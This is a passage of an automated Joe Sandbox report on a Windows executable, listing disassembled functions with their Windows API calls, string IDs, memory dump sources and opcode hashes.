                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy___std_exception_destroy
                                • String ID: 0q>$@ >
                                • API String ID: 2970364248-3763285519
                                • Opcode ID: ac12285b465ced2d03091c0ee4ad146dbef5e28358423164c83f1ea412dd8369
                                • Instruction ID: 52d9a980ac4228ffde9dc38c7b24868e9379e9e1f46a84c6509b6b0bc5ded343
                                • Opcode Fuzzy Hash: ac12285b465ced2d03091c0ee4ad146dbef5e28358423164c83f1ea412dd8369
                                • Instruction Fuzzy Hash: A141AEB0E0034D9BDF11CFA4D885BEEBBB4BF48308F24422EE515A7241EBB95945CB95
                                Function 003F2840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32 ref: 003F2878
                                • MonitorFromWindow.USER32(00000002), ref: 003F288E
                                • GetMonitorInfoW.USER32(00000000,?), ref: 003F28D6
                                • SetWindowPos.USER32(00000000,?,?,000002DA,000001FE,00000004), ref: 003F2912
                                • GetLastError.KERNEL32 ref: 003F2925
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$Monitor$ErrorFromInfoLast
                                • String ID: (
                                • API String ID: 3978234620-3887548279
                                • Opcode ID: 6a24ca217ce0d79e67c27634ae0b28d7a9ec8df64da1e56816d0cf5be464a83e
                                • Instruction ID: ac78ed9750f91c4497b344d1b77b477a004c6c1a519ff447b972692804b9cd03
                                • Opcode Fuzzy Hash: 6a24ca217ce0d79e67c27634ae0b28d7a9ec8df64da1e56816d0cf5be464a83e
                                • Instruction Fuzzy Hash: 002106352002009FD3119B25EC2AF2B77A9EBC5714F45863DFA8557190EBB19C11CB9A
                                Function 003EF090 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(Advapi32.dll,A05DD77D), ref: 003EF0E4
                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 003EF0FB
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,A05DD77D), ref: 003EF130
                                • RegCloseKey.ADVAPI32(00000000), ref: 003EF143
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressCloseHandleModuleOpenProc
                                • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                • API String ID: 823179699-3913318428
                                • Opcode ID: e90e44cccf9ae82d18f933ca8e6a56a597d2792258881f9a735cbd0215d37f9f
                                • Instruction ID: 1dcfc303c2fc841ebd9b6aa2a2a63e4f2678e78f49ea0d0f8d9c19cc7543ec71
                                • Opcode Fuzzy Hash: e90e44cccf9ae82d18f933ca8e6a56a597d2792258881f9a735cbd0215d37f9f
                                • Instruction Fuzzy Hash: 4B316171A04259EFDB15CF55DC45BABBBB8EB48710F104639F915E7280D7B4A900CB54
                                Function 00431429 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A05DD77D,?,00431536,?,?,?,00000000), ref: 004314EA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: api-ms-$ext-ms-
                                • API String ID: 3664257935-537541572
                                • Opcode ID: 57b9ef3e82dc7e7c84475f0e38d427de66db5ffd7e68d036d3f5188ee3b24cf4
                                • Instruction ID: b67ddcd709ffd76ed9c11d9dec0299e3848cd22c091e8148d8ac6bdc8926718c
                                • Opcode Fuzzy Hash: 57b9ef3e82dc7e7c84475f0e38d427de66db5ffd7e68d036d3f5188ee3b24cf4
                                • Instruction Fuzzy Hash: 0021E731A01211B7CB219F61EC45B5B7758AFA6764F251222FD06A73E0EA78ED00C6D9
                                Function 003F26B0 Relevance: 10.6, APIs: 7, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32 ref: 003F26BE
                                • GetWindowLongW.USER32(000000F0), ref: 003F26D4
                                • GetLastError.KERNEL32 ref: 003F26F1
                                • SetWindowLongW.USER32(000000F0,?), ref: 003F2713
                                • GetLastError.KERNEL32 ref: 003F2726
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027), ref: 003F274A
                                • GetLastError.KERNEL32 ref: 003F275D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$ErrorLast$Long
                                • String ID:
                                • API String ID: 3349814059-0
                                • Opcode ID: ad169c5069168937617b34822b63d35b03d06573a49a94f6e3b18fa7579b0432
                                • Instruction ID: 6a49f90b422fc24aaf49155cfc50a80260ac1f7c2ad900def5dde405a8d45416
                                • Opcode Fuzzy Hash: ad169c5069168937617b34822b63d35b03d06573a49a94f6e3b18fa7579b0432
                                • Instruction Fuzzy Hash: 2911E335644258ABE7227725AC0AB2B3F19E741765F150230FB54851F2EAB28C14866E
                                Function 004083A0 Relevance: 9.3, APIs: 6, Instructions: 300COMMON
                                Download Yara Rule
                                APIs
                                • 759783B0.OLE32(00000000), ref: 0040849E
                                • 759783B0.OLE32(00000000,?,-00000002), ref: 0040852A
                                • 759783B0.OLE32(00000000), ref: 004085C6
                                • 759783B0.OLE32(00000000,?,-00000002), ref: 00408698
                                • 759783B0.OLE32(00000000), ref: 0040872B
                                • 759783B0.OLE32(-00000002,-00000002), ref: 0040875F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: 759783
                                • String ID:
                                • API String ID: 3308533907-0
                                • Opcode ID: bc4376195842df28560b5221f4cc94db706b8cb2b9cb17dac727634f4e04927f
                                • Instruction ID: 307a3f3e13ac97278003f1885a75dfb276761d1b81388d445c0c1b72fc73cc78
                                • Opcode Fuzzy Hash: bc4376195842df28560b5221f4cc94db706b8cb2b9cb17dac727634f4e04927f
                                • Instruction Fuzzy Hash: F6C19070D0121AEFDB04CF68DA54B9EFBB4BF15304F10826EE854A7391DB79AA44CB94
                                Function 0041BA30 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 216COMMON
                                Download Yara Rule
                                APIs
                                • LocalFree.KERNEL32(?,?), ref: 0041BB45
                                • GetLastError.KERNEL32(?), ref: 0041BB51
                                • LocalFree.KERNEL32(00000000,?), ref: 0041BBB7
                                • LocalFree.KERNEL32(00000000,?), ref: 0041BC25
                                • LocalFree.KERNEL32(00000000), ref: 0041BC64
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLocal$ErrorLast
                                • String ID: 1.2.840.113549.1.9.5
                                • API String ID: 4216857709-925610549
                                • Opcode ID: 39543add12455dab4cfd73ba5d5940706ad4d347c30e9b030b26d6cc3b4b34d4
                                • Instruction ID: 327cbf5ca370525d674217bee7950bf4e12cb719ae96fc60b2cea0672c44f898
                                • Opcode Fuzzy Hash: 39543add12455dab4cfd73ba5d5940706ad4d347c30e9b030b26d6cc3b4b34d4
                                • Instruction Fuzzy Hash: 8971AC75A042098FCB14CF69D8817EEBBB1EF49310F2481AAD841A7341DB3AAD44CBD4
                                Function 003E29F0 Relevance: 9.1, APIs: 6, Instructions: 77memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32 ref: 003E2A14
                                • HeapFree.KERNEL32(00000000,?), ref: 003E2A1D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003E2A3F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E2A46
                                • GetProcessHeap.KERNEL32 ref: 003E2A8B
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E2A95
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$Free$Allocate
                                • String ID:
                                • API String ID: 168621272-0
                                • Opcode ID: d1c62de5b9237e6ba5d45555fabd0be752717fe4a3aa779c45c39c73a52e8785
                                • Instruction ID: 829d6712c4d8f8b63f4bd272b0ce0e07ba1f4417b9924b3caeea837744346e5b
                                • Opcode Fuzzy Hash: d1c62de5b9237e6ba5d45555fabd0be752717fe4a3aa779c45c39c73a52e8785
                                • Instruction Fuzzy Hash: 5521087A5012219BDB218F56EC44BA7BB6CFF15335F10423AFA15CB280DB719C11CBA0
                                Function 00427BA6 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000001,?,00427B9D,004271DC,00424333,A05DD77D,?,?,?,00000008,0043E73C,000000FF,?,00402444,00000008,00000008), ref: 00427BB4
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00427BC2
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00427BDB
                                • SetLastError.KERNEL32(00000000,00427B9D,004271DC,00424333,A05DD77D,?,?,?,00000008,0043E73C,000000FF,?,00402444,00000008,00000008,A05DD77D), ref: 00427C2D
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: dbb4ea759f1d86ac83c40dd66327dea335b03d15d7f98e5c6ff0f94cbf2b88ef
                                • Instruction ID: e016f826375f520073410a82cc90b752a98fdac70f20fca12df1a228fb83daad
                                • Opcode Fuzzy Hash: dbb4ea759f1d86ac83c40dd66327dea335b03d15d7f98e5c6ff0f94cbf2b88ef
                                • Instruction Fuzzy Hash: 2A01F13231E3315EA7222BB7BC8596B2A44DB22379BA0023FF210452F1EE6A4C02914D
                                Function 003F2250 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 222COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$759783FreeShowStringUpdate
                                • String ID: \McAfee\MSSPRes\
                                • API String ID: 2726993354-1001217308
                                • Opcode ID: 7ec9169ba3607473b62ce2f509328a9d0a795c55153cb92bf4c8796288b1ba7b
                                • Instruction ID: f33fbf144ae598b20e141acb5dcc3605e41bf27f7a3b9fd58f57f48eb5ab6fbf
                                • Opcode Fuzzy Hash: 7ec9169ba3607473b62ce2f509328a9d0a795c55153cb92bf4c8796288b1ba7b
                                • Instruction Fuzzy Hash: 1381F3B1E00248EFDB01DFA4DC49BAFBBB5EF44304F148119EA05E7290E7B99A45CB65
                                Function 003E6F20 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E70AE
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E7140
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___std_exception_copy___std_exception_destroy
                                • String ID: 0q>$@ >$@ >
                                • API String ID: 2970364248-2536544690
                                • Opcode ID: 9f082496251a2a1214bedcf1fca7a80fad79d0c672eb25d47762aed686480c1d
                                • Instruction ID: 4be5c755bc5c0f73fdcc95a7bf7c486c96e925e116adf58b58b3166e996c0156
                                • Opcode Fuzzy Hash: 9f082496251a2a1214bedcf1fca7a80fad79d0c672eb25d47762aed686480c1d
                                • Instruction Fuzzy Hash: 5171D171E002589FDF05DF99D881ADDFBB4FF48310F54822EE804A7282EB75A944CBA5
                                Function 004186A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 196COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 004188DA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff$gfff$gfff
                                • API String ID: 118556049-2178600047
                                • Opcode ID: 4d7262547963615829dbf36076158be309bc6ffa61fcb69a0a20be55161f3f32
                                • Instruction ID: 7cdaf9acf6d8c5ab54670419f7ec040f8a9f3c16075b6cf6f2fce0729f454ef2
                                • Opcode Fuzzy Hash: 4d7262547963615829dbf36076158be309bc6ffa61fcb69a0a20be55161f3f32
                                • Instruction Fuzzy Hash: 0A71C2B1A006098FDB08DF59D950AAEB7B1FF88304F24822EE406DB791DB35F951CB95
                                Function 00413B80 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 188COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00413D9B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff$gfff$gfff
                                • API String ID: 118556049-2178600047
                                • Opcode ID: d0286d032bb7a2b3f97adb7a64c81fffb3093487f5b2ec60185f946c08a12ee6
                                • Instruction ID: bd563ef2f8a41af83d2e9c645c13c48e5453d85c61890b27fc4bb0cd522a53bf
                                • Opcode Fuzzy Hash: d0286d032bb7a2b3f97adb7a64c81fffb3093487f5b2ec60185f946c08a12ee6
                                • Instruction Fuzzy Hash: 0361E6B1A005068BD70CDF2DD995AAAB7B1FF88304F14822EE915DB341EB35FA91C785
                                Function 00409E00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                • RtlUnicodeToUTF8N.NTDLL(?,00002000,00000000,?,?), ref: 00409E81
                                • RtlUnicodeToUTF8N.NTDLL(?,00002000,00000000,?,?), ref: 00409EED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unicode
                                • String ID: <{!truncated!}>$`F$`F
                                • API String ID: 470584828-3795525384
                                • Opcode ID: 0e467a81dbf682c9254cc2c5aca90d405ba1d9c6bba62a64f992909b970830cd
                                • Instruction ID: ee72081003e0e917e5d4261da7772dea1c5eeeeb5e898e48badfe415b05879fd
                                • Opcode Fuzzy Hash: 0e467a81dbf682c9254cc2c5aca90d405ba1d9c6bba62a64f992909b970830cd
                                • Instruction Fuzzy Hash: 5B517AB0E042199BEF14CFA8C9457EEBBB4EB48314F24816AE811B73C2D7795D448B99
                                Function 003F3B50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F3B9B
                                • SysAllocString.OLEAUT32(ComponentHost), ref: 003F3C0F
                                • VariantClear.OLEAUT32(?), ref: 003F3C48
                                • _com_issue_error.COMSUPP ref: 003F3CA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
